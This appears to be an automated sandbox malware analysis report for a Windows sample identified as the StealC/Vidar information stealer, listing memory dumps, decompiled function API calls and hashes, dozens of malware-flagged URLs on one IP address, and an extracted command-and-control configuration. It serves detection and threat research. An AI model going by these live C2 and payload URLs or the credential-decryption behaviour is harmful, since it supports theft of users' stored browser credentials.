Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID:
API String ID: 367037083-0
Opcode ID: 5175cc58ab1a9d1b3b32c4756a427204b7fde5e8c1e99d44797ae90d6dfdb2ef
Instruction ID: f20ba195953fe60d8dda0ac920ee89f95c16ff1fc6c4e0cc7735bfc7970730e7
Opcode Fuzzy Hash: 5175cc58ab1a9d1b3b32c4756a427204b7fde5e8c1e99d44797ae90d6dfdb2ef
Instruction Fuzzy Hash: 214153B1D10209EBDF04EFA4D849AEEB774AF44344F00C418E519B7291DB796609DF92

Function 6CBD6470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6CBD82BC,?,?), ref: 6CBD649B

Part of subcall function 6CBACA10: malloc.MOZGLUE(?), ref: 6CBACA26

memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBD64A9

Part of subcall function 6CBCFA80: GetCurrentThreadId.KERNEL32 ref: 6CBCFA8D
Part of subcall function 6CBCFA80: AcquireSRWLockExclusive.KERNEL32(6CC1F448), ref: 6CBCFA99

ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBD653F
free.MOZGLUE(?), ref: 6CBD655A

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
String ID:
API String ID: 3596744550-0
Opcode ID: c67049c5e1678ca4d6b63d68b1c44cbe5074597f46ffded429cafe91bd4fdd8d
Instruction ID: 30c5037a575e6ac6d4435c3bfaa87f452b5743def04e921b876ee2cbd211233b
Opcode Fuzzy Hash: c67049c5e1678ca4d6b63d68b1c44cbe5074597f46ffded429cafe91bd4fdd8d
Instruction Fuzzy Hash: 94315DB5A043459FD704CF14D884A9EBBF4FF89314F00482EE89A97741DB34E919CB92

Function 6CBAB4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CBAB4F5
AcquireSRWLockExclusive.KERNEL32(6CC1F4B8), ref: 6CBAB502
ReleaseSRWLockExclusive.KERNEL32(6CC1F4B8), ref: 6CBAB542
free.MOZGLUE(?), ref: 6CBAB578

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 009f26d60d882344c303201ab7b1d2a11723ba7ea381b4d547643cb11a96d337
Instruction ID: 0afdf0b722dcedb912e41b2fe8c22a3fc533701c6b43a0dafceabf78836b7eb4
Opcode Fuzzy Hash: 009f26d60d882344c303201ab7b1d2a11723ba7ea381b4d547643cb11a96d337
Instruction Fuzzy Hash: A5110631908B85CBD312CF6AC411765B3B1FF96318F10570AE89953F01EBB0B5C68791

Function 00777980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00780E00,00000000,?), ref: 007779B0
RtlAllocateHeap.NTDLL(00000000), ref: 007779B7
GetLocalTime.KERNEL32(?,?,?,?,?,00780E00,00000000,?), ref: 007779C4
wsprintfA.USER32 ref: 007779F3

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID:
API String ID: 377395780-0
Opcode ID: e30f4d44f5668ecbeb07707ae32c239da3ce23cd6de098c30c68f5dc3e654707
Instruction ID: faeecd328b6381592e838e3d87861ad81dcc36dd386f7dec917132b1214ca700
Opcode Fuzzy Hash: e30f4d44f5668ecbeb07707ae32c239da3ce23cd6de098c30c68f5dc3e654707
Instruction Fuzzy Hash: 011115B2918118ABCB149FC9DD45BBEB7F8EB49B11F10421AF605A2280E33D5940DBB1

Function 6CBD3DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6CB9F20E,?), ref: 6CBD3DF5
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6CB9F20E,00000000,?), ref: 6CBD3DFC
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CBD3E06
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6CBD3E0E

Part of subcall function 6CBCCC00: GetCurrentProcess.KERNEL32(?,?,6CB931A7), ref: 6CBCCC0D
Part of subcall function 6CBCCC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6CB931A7), ref: 6CBCCC16

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
String ID:
API String ID: 2787204188-0
Opcode ID: 916ed3e8c957594682b19edcdf066f2d8453a1b0331f9f44f683289293dcd438
Instruction ID: edede134d8cc4119ecac8c1f464f5272befdb0eebc89fa30d4922e13ad84093e
Opcode Fuzzy Hash: 916ed3e8c957594682b19edcdf066f2d8453a1b0331f9f44f683289293dcd438
Instruction Fuzzy Hash: 1BF012B16002087FE700AB55DC42DAF377DEB46664F050020FD0857B41D635BD2686F7

Function 0077C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0077C74E

Part of subcall function 0077BF9F: __amsg_exit.LIBCMT ref: 0077BFAF

__getptd.LIBCMT ref: 0077C765
__amsg_exit.LIBCMT ref: 0077C773
__updatetlocinfoEx_nolock.LIBCMT ref: 0077C797

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
String ID:
API String ID: 300741435-0
Opcode ID: ad870bf06bbb2779c8af31de0b8807f768b920f49f9c7e39ed04e19cc2f61da3
Instruction ID: e9d406376744b68d57049b9c8c2b37733a76c8052fd0e97748a43ad27eddf4f1
Opcode Fuzzy Hash: ad870bf06bbb2779c8af31de0b8807f768b920f49f9c7e39ed04e19cc2f61da3
Instruction Fuzzy Hash: A1F06D32940600EBEF26BBB8584A75D33A06F04BA0F24C14DF40CA61D2CF6C59409F96

Function 6CBE85B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6CBE85D3

Part of subcall function 6CBACA10: malloc.MOZGLUE(?), ref: 6CBACA26

?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6CBE8725

Strings

map/set<T> too long, xrefs: 6CBE8720

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: Xlength_error@std@@mallocmoz_xmalloc
String ID: map/set<T> too long
API String ID: 3720097785-1285458680
Opcode ID: 64c98b9357af26053d8f264f0d70212111e2cc906d52e0b189f7a540bc2bd6c5
Instruction ID: 0c61bac386efdd2323a640c7cbf7dc6a5499eb89ca86f109b9fb62c3e868fb39
Opcode Fuzzy Hash: 64c98b9357af26053d8f264f0d70212111e2cc906d52e0b189f7a540bc2bd6c5
Instruction Fuzzy Hash: 7C518674600A818FC701CF18C084B5ABBF1FF5A758F18C29AD8595BB52C336E885CF92

Function 6CBD3CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CBD3D19
mozalloc_abort.MOZGLUE(?), ref: 6CBD3D6C

Strings

d, xrefs: 6CBD3D58

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: _errnomozalloc_abort
String ID: d
API String ID: 3471241338-2564639436
Opcode ID: acc32628575f6192bb2eb4fa1083128521f63526632c3828e8f1ab526816bfe5
Instruction ID: 228f2561d9c33a47abca44ddc1df64797c7d05c7ada7234d68502d256a7aa10a
Opcode Fuzzy Hash: acc32628575f6192bb2eb4fa1083128521f63526632c3828e8f1ab526816bfe5
Instruction Fuzzy Hash: 7811C135E046D8DBDB008F69C8154EEB775EF96318B46821CEC45ABA03EB30A9C4CB91

Function 6CBF6DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6CBF6E22
__Init_thread_footer.LIBCMT ref: 6CBF6E3F

Strings

MOZ_DISABLE_WALKTHESTACK, xrefs: 6CBF6E1D

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: Init_thread_footergetenv
String ID: MOZ_DISABLE_WALKTHESTACK
API String ID: 1472356752-1153589363
Opcode ID: 227a802749854fc8eb98ae170d0c046990ee7ced9a197334e7273c864362cd13
Instruction ID: 9eb0267763b75978d3c41e9fbe39f72029d82d1fc86eb99cf1860c251bea42d0
Opcode Fuzzy Hash: 227a802749854fc8eb98ae170d0c046990ee7ced9a197334e7273c864362cd13
Instruction Fuzzy Hash: 6AF0593A6092C0DFDA008BAEC852A857771F323218F044165CC2887F51D761E51BCE93

Function 6CBEB5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6CBEB2C9,?,?,?,6CBEB127,?,?,?,?,?,?,?,?,?,6CBEAE52), ref: 6CBEB628

Part of subcall function 6CBE90E0: free.MOZGLUE(?,00000000,?,?,6CBEDEDB), ref: 6CBE90FF
Part of subcall function 6CBE90E0: free.MOZGLUE(?,00000000,?,?,6CBEDEDB), ref: 6CBE9108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CBEB2C9,?,?,?,6CBEB127,?,?,?,?,?,?,?,?,?,6CBEAE52), ref: 6CBEB67D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CBEB2C9,?,?,?,6CBEB127,?,?,?,?,?,?,?,?,?,6CBEAE52), ref: 6CBEB708
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6CBEB127,?,?,?,?,?,?,?,?), ref: 6CBEB74D

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 238a4fa67e42762369b4e1132652085123c7d9881c7709d18c29d364e0b48cd8
Instruction ID: 191aa35b377e7e17fa34edbdb434c69f3e89e5aa9c81b40726076206a2ca39ee
Opcode Fuzzy Hash: 238a4fa67e42762369b4e1132652085123c7d9881c7709d18c29d364e0b48cd8
Instruction Fuzzy Hash: BF51FEB1A013568FDB14CF19C98076EB7B5FF88B84F45852DC85AABB00DB30E804CBA5

Function 6CBFB580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6CBA0A4D), ref: 6CBFB5EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6CBA0A4D), ref: 6CBFB623
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6CBA0A4D), ref: 6CBFB66C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6CBA0A4D), ref: 6CBFB67F

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: e3998a7aa2f7c0386abdf80cfa686a8ad6c9fa73c262c510ebea4ceb34185e4b
Instruction ID: d474d2377dce5d05868aa5bc110df02b5248c90f4b3a6016eae436d26d6a739b
Opcode Fuzzy Hash: e3998a7aa2f7c0386abdf80cfa686a8ad6c9fa73c262c510ebea4ceb34185e4b
Instruction Fuzzy Hash: 3631F471A002169FEB10CF59C84465EFBB6FF81304F16852AD8269B701DB31E91ACBA1

Function 6CBCF5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00010000), ref: 6CBCF611
memcpy.VCRUNTIME140(?,?,?), ref: 6CBCF623
memcpy.VCRUNTIME140(?,?,00010000), ref: 6CBCF652
memcpy.VCRUNTIME140(?,?,?), ref: 6CBCF668

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction ID: cf5851ed5dc3805eaeef9bf07602c0d2307d0bd90dd8bba17e3f156c274894e5
Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction Fuzzy Hash: E5313E71B00214AFC714CF5DCCC0A9A77B5EB88354B14857DEA498BB04E636FD448B91

Source: http://185.215.113.37/0d60be0de163924d/nss3.dlly	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpdowsApps	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/b	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php.dllA	Avira URL Cloud: Label: malware
Source: http://185.215.113.37	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpimple-storage.json	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll0	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpw	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phption:	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpa	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpGDHJDHDAFHJJKJEHC	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dllV	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll8	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpZ	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll5.113.37	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpB	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php?	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dllJ	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpH	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php.	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dllA	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php4	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php3	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php:	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpwser	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dllg	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php#	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dlll	Avira URL Cloud: Label: malware

Source: 0.2.file.exe.760000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Source: 0.2.file.exe.760000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00769B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00769B60
